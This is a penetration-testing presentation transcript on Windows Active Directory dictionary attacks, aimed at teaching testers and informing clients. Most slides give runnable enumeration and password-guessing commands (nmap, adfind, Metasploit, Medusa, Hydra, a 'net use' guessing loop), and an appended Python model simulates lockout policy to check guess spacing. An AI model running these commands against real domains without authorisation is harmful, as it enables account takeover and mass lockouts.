Introduction to Windows Dictionary Attacks
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:

Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack

More security blogs by the authors can be found @
https://www.netspi.com/blog/

Introduction to Windows Dictionary Attacks Presentation Transcript

  • 1. Introduction to Windows Dictionary Attacks
    Author: Scott Sutherland
  • 2. Who am I?
    Scott Sutherland
    • Principal Security Consultant @ NetSPI
    • Over 10 years of consulting experience
    • Security researcher: blogs, white papers, tools, etc.
  • 3. Presentation Goals
    • Identify the value of dictionary attacks
    • Provide new penetration testers with a safe approach to Windows dictionary attacks
    • Provide security professionals with questions they should be asking their contractors
  • 4. Before we begin…
    Dictionary Attack
    Brute Force Attack
  • 5. Why dictionary attacks?
    What are the goals?
    • Identify accounts configured with weak or default passwords – “It’s human nature”
    • Use accounts as entry points during penetration tests
    What’s the impact?
    • Unauthorized access to critical:
      ‒ Systems
      ‒ Applications
      ‒ Data
    • User impersonation
  • 6. Are There Alternatives?
    Yes. Approaches typically include:
    • Cracking password hashes offline with:
      ‒ Pre-computed hash libraries like Rainbow Tables
      ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper
    • Dumping clear text passwords for interactive sessions with Mimikatz
  • 7. Dictionary Attacks: Process Overview
    Windows Dictionary Attack Process
    1. Identify domains
    2. Enumerate domain controllers
    3. Enumerate domain users
    4. Enumerate domain lockout policy
    5. Create a dictionary
    6. Perform attack
  • 8. Identify Domains: Methods
    Unauthenticated Methods
    • DHCP information
    • NetBIOS queries
    • DNS queries
    • Sniffing network traffic
    • Review RDP drop-down lists
    Authenticated Methods
    • Review the output of the SET command for “USERDNSDOMAIN”
    • Review the registry for the default domain
  • 9. Identify Domains: Tools (Method / Tools / Auth required)
    DHCP Info (Auth: No)
      IPCONFIG
    NetBIOS Queries (Auth: No)
      NBTSTAT -A <IP>
    DNS Queries (Auth: No)
      nmap -sL <IP Range> -oA output_rnds
      ./reverseraider -r <IP Range>
      ./dnswalk victim.com
      perl fierce.pl -dns <domainname> -threads 5 -file <domainname>-dns.output
    Sniffing (Auth: No)
      Wireshark (GUI) + filter for browser traffic
      Network Monitor (GUI)
      Etherape (GUI)
    RDP Drop Down (Auth: No)
      nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client
  • 10. Enumerate DCs: Methods
    Unauthenticated Methods
    • DNS queries
    • RPC queries
    • Port scanning
    • NetBIOS scanning
    Authenticated Methods
    • NET GROUP commands
    • LDAP queries
  • 11. Enumerate DCs: Tools (Method / Tools / Auth required)
    DNS Queries (Auth: No)
      NSLOOKUP -type=SRV _ldap._tcp.<domain>
    RPC Queries (Auth: No)
      NLTEST /DCLIST <domain>
      FindPDC <domain> <request count>
    Port Scanning (Auth: No)
      NMAP -sS -p389,636 -PN <IP Range>
    NetBIOS Scanning (Auth: No)
      FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
    NET GROUP Command (Auth: Yes)
      Net group "Domain Controllers" /domain
    LDAP Queries (Auth: Yes & No)
      LDAP Administrator (GUI tool)
      Hyena (GUI tool)
      adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
  • 12. Enumerate Domain Users: Methods
    Unauthenticated Methods
    • RPC queries
    • SID brute forcing
    • SNMP queries
    • LDAP queries
    • SharePoint fuzzing
    Authenticated Methods
    • NET USER command
    • WMI commands
  • 13. Enumerate Domain Users: Tools 1 (Method / Tools / Auth required)
    RPC Endpoints (Auth: Yes & No)
      dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt
      enum -N <ip>
      enum -U <ip>
    SID Brute Forcing (Auth: Yes & No)
      ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt
      Getacct (GUI)
    SNMP Queries (Auth: Yes & No)
      ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E
      Mibbrowser (GUI)
      SNMP Walk
  • 14. Enumerate Domain Users: Tools 2 (Method / Tools / Auth required)
    LDAP Queries (Auth: Yes & No)
      adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt
    SharePoint Fuzzing (Auth: Yes & No)
      Fuzz parameters with Burp to enumerate domain users. Example URL:
      https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]
    NET USERS Command (Auth: Yes)
      Net users /domain > domain_users.txt
    WMI Commands (Auth: Yes)
      wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt
  • 15. Get Domain Lockout Policy: Methods
    Unauthenticated Methods
    • RPC endpoints
    Authenticated Methods
    • NET ACCOUNTS command
    Example policy:
      Lockout threshold: 5
      Lockout duration: 15
      Lockout observation window: 15
    What does it all mean?
    • Threshold, duration, and window
  • 16. Get Domain Lockout Policy: Tools (Method / Tools / Auth required)
    RPC Queries (Auth: Yes & No)
      Enum -P <IP Address>
      dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
    NET ACCOUNTS Command (Auth: Yes)
      NET ACCOUNTS
  • 17. Create a Dictionary: Methods
    Classics Still Work
    • Blank
    • Username as password
    • password
    Common Formulas = Most Effective
    • <Password><Number>
    • <Companyname><Number>
    • <Season><Year>
    • <Sports team><Number>
    Popular Dictionaries
    • Metasploit dictionaries
    • RockYou
    • FuzzDB
    • John the Ripper
  • 18. Create a Dictionary: Tools (Dictionary / URLs or Lists)
    Classics
      Blank password
      Username as password
      password as password
    Formulas
      <Password><Number>
      <Companyname><Number>
      <Season><Year>
      <Sports team><Number>
      Your brain! Think of keywords relative to the target company / geographic location and you’ll get more out of your dictionary attacks!
    RockYou
      http://www.skullsecurity.org/wiki/index.php/Passwords
    FuzzDB
      http://code.google.com/p/fuzzdb/
      https://github.com/rustyrobot/fuzzdb
    John the Ripper
      http://www.openwall.com/wordlists/
  • 19. Perform Dictionary Attack: Rules
    The Rule to Live By: Respect the lockout policy
    • General idea = attempt a few passwords for all of the domain users each round, not 1,000 passwords against one user
    • Subtract 2 attempts from the lockout policy. Example: Lockout=5, Attempts=3
    • Wait 5 to 10 minutes beyond the observation window
  • 20. Perform Dictionary Attack: Tools (Tool / Command / OS)
    Medusa (Linux)
      medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
    Bruter (Windows)
      Easy-to-use GUI, and no CLI that I know of.
    Metasploit smb_login (Windows and Linux)
      ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E
    Hydra (Windows and Linux)
      hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
    Batch Script (Windows)
      FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a
  • 21. Conclusions
    • There is more than one way to do everything!
    • Enumerate all available options
    • It’s easy to lock out accounts – respect the password policy
    • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests
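The lockout behaviour that slides 15 and 19 rely on, as an added example that is not part of the original presentation: a small Python model of the Windows lockout policy (threshold, duration, observation window), the slide-19 rule derived from it, and a replay that shows why the bad-password counter is keyed to the last failure, so rounds spaced shorter than the observation window lock every account while the spaced schedule does not. The policy numbers are the slide's sample values; the user names, the function names and the model itself are constructed here and do not describe any real domain.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Set, Tuple

@dataclass
class LockoutPolicy:
    threshold: int     # bad passwords before lockout (0 = domain never locks)
    duration_min: int  # minutes an account stays locked
    window_min: int    # counter resets this many minutes after the LAST failure

SAMPLE_POLICY = LockoutPolicy(5, 15, 15)  # slide 15's example values (constructed)

@dataclass
class Account:
    bad_count: int = 0
    last_bad: Optional[float] = None
    locked_until: Optional[float] = None

def failed_logon(p: LockoutPolicy, a: Account, t: float) -> bool:
    """Apply one failed logon at minute t; return True if the account is locked."""
    if a.locked_until is not None:
        if t < a.locked_until:
            return True  # still locked: the attempt is simply rejected
        a.locked_until, a.bad_count = None, 0  # duration (>= window) elapsed
    if a.last_bad is not None and t - a.last_bad > p.window_min:
        a.bad_count = 0  # observation window expired since the last failure
    a.bad_count += 1
    a.last_bad = t
    if p.threshold and a.bad_count >= p.threshold:
        a.locked_until = t + p.duration_min
        return True
    return False

def plan_round(p: LockoutPolicy, margin_min: int = 5) -> Tuple[Optional[int], int]:
    """Slide 19 rule: threshold minus 2 guesses per user per round, then wait the
    observation window plus a margin. None for attempts means no lockout policy."""
    attempts = None if p.threshold == 0 else max(p.threshold - 2, 0)
    return attempts, p.window_min + margin_min

def locked_users(p: LockoutPolicy, users, n_guesses: int,
                 per_round: int, wait_min: int) -> Set[str]:
    """Replay a schedule where every guess fails: per_round guesses per user per
    round (treated as simultaneous), wait_min minutes between rounds."""
    state: Dict[str, Account] = {u: Account() for u in users}
    locked, t = set(), 0.0
    for start in range(0, n_guesses, per_round):
        for _ in range(min(per_round, n_guesses - start)):
            for u in users:
                if failed_logon(p, state[u], t):
                    locked.add(u)  # self-inflicted denial of service
        t += wait_min
    return locked
```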